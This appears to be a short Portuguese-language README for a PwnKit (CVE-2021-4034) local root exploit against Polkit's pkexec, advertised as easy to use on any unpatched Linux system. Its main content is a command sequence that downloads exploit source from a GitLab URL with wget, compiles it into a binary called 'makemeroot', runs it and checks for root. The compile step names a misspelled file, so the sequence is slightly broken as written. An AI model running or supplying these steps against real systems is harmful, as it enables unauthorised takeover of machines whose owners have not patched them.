
Exploração local de escalonamento de privilégios para CVE-2021-4034 (PWNKIT) direcionada ao pkexec do Polkit, permitindo que usuários sem privilégios obtenham acesso root em sistemas Linux vulneráveis.
CVE-2021-4034 (PWNKIT)
Uma vulnerabilidade de corrupção de memória no pkexec do Polkit, que permite que qualquer usuário sem privilégios obtenha privilégios totais de root em um sistema vulnerável usando a configuração padrão do polkit.
Fácil de usar, escalonamento local de privilégios em qualquer sistema linux sem patch.
wget https://gitlab.com/nelox/pwnkit-vulnerability/blasty-vs-pkexec.c
gcc bblasty-vs-pkexec.c -o makemeroot
./makemeroot
whoami